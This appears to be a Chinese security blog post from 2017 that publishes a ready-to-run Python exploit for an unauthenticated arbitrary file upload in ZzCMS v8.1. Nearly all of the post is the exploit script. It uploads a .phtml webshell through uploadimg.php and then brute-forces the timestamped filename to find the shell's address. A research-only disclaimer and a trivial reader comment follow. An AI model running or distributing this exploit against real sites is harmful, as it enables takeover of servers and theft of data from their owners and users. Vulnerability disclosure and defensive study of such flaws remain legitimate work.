ZzCMS v8.1 前台无条件Getshell

  • 内容
  • 相关
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。


zzcms某处过滤不严格,导致可上传任意脚本文件

2017-07-08

直接贴出exp



# -*- coding:utf-8 -*- 
import requests
import threading
import time
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-u")
args = parser.parse_args()
urls = args.u
urlib = urls+'uploadimg.php'
def B(url):
    try:
        if requests.get(url,timeout=3).status_code == 200:
            lock.acquire()
            print u"[+++] shell地址:", url
            lock.release()
    except:
        pass
def L(url,filename):
	print u'[+++] ADMINSS:正在尝试上传shell'
	try:
		urls = '%s'%url
		files = {'g_fu_image[]': ('%s'%filename, open('%s'%filename, 'rb'), 'image/jpg', {'Expires': '0'})}
		r = requests.post(urls, files=files)
		fname = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
		froot = '/uploadfiles/'+time.strftime('%Y-%m',time.localtime(time.time()))+'/'
		upfrt = urls+froot+fname
		shll =  upfrt.replace('uploadimg.php/', '')
		return shll 
	except:
		bugs = u'[+++]ERROR:文件上传失败'
		print bugs
print '[+++] ADMINSS:'+urls
shel = L(urlib,'1.phtml')
shell = shel
print u'[+++] ADMINSS:上传成功 正在爆破shell地址'
lock = threading.Lock()
pool = []
for x in xrange(100, 999):
    pool.append(threading.Thread(target=B, args=(shell+str(x)+'.phtml',)))
    if len(pool) > 20 or x == 998:
        for x in pool:
            x.start()
       	for x in pool:
           	x.join()
        pool = []


本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:ZzCMS v8.1 前台无条件Getshell - https://www.0dayhack.com/post-379.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    壞ヤρì滊 Lv.1 Chrome 45.0.2454.101 Chrome 45.0.2454.101 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    滴!学生卡!打卡时间:下午6:59:35,请上车的乘客系好安全带~

    广东省广州市 电信